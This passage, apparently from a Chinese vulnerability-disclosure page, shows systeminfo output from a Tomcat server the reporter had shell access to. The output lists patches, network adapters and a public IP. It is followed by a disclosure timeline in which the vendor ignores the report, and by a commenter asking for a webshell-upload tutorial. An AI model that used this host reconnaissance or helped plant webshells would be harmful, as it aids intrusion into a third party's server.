[162]: KB2712808 - Update
[163]: KB2727528 - Update
[164]: KB2742604 - Update
[165]: KB2770660 - Update
[166]: KB2780091 - Update
[167]: KB2803821-v2 - Update
[168]: KB2807986 - Update
[169]: KB2820917 - Update
[170]: KB2834886 - Update
[171]: KB2847311 - Update
[172]: KB2859537 - Update
[173]: KB2862152 - Update
[174]: KB2862335 - Update
[175]: KB2864063 - Update
[176]: KB2868626 - Update
[177]: KB2876217 - Update
[178]: KB2876331 - Update
[179]: KB2892076 - Update
[180]: KB2893294 - Update
[181]: KB2898715 - Update
[182]: KB2900986 - Update
[183]: KB2901115 - Update
[184]: KB2909213 - Update
[185]: KB2914368 - Update
[186]: KB2926765 - Update
[187]: KB2929961 - Update
[188]: KB2930275 - Update
[189]: KB2939576 - Update
[190]: KB2957503 - Update
[191]: KB2957509 - Update
[192]: KB2957689 - Update
[193]: KB2961072 - Update
[194]: KB2962872 - Update
[195]: KB923561 - Update
[196]: KB927891 - Update
[197]: KB929123 - Update
[198]: KB942831 - Update
[199]: KB944653 - Update
[200]: KB946026 - Update
[201]: KB948496 - Update
[202]: KB950224-v3 - Update
[203]: KB950762 - Update
[204]: KB950974 - Update
[205]: KB952004 - Update
[206]: KB952954 - Update
[207]: KB954155 - Update
[208]: KB956844 - Update
[209]: KB959426 - Update
[210]: KB960803 - Update
[211]: KB960859 - Update
[212]: KB967715 - Update
[213]: KB969059 - Update
[214]: KB971029 - Update
[215]: KB971032 - Update
[216]: KB971657 - Update
[217]
网卡: 安装了 2 个 NIC。
[01]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client)
连接名: 本地连接 2
状态: 媒体连接已中断
[02]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client)
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: 61.145.119.248
D:\Tomcat7\>

修复方案

加强安全意识

状态信息 2015-11-06: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复
回应信息危害等级:无影响厂商忽略忽略时间:2015-11-09 17:21
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

求上传马教程,为什么我上传马不成功,上传简短的txt就可以成功。

kazaf02015-11-09 22:12:00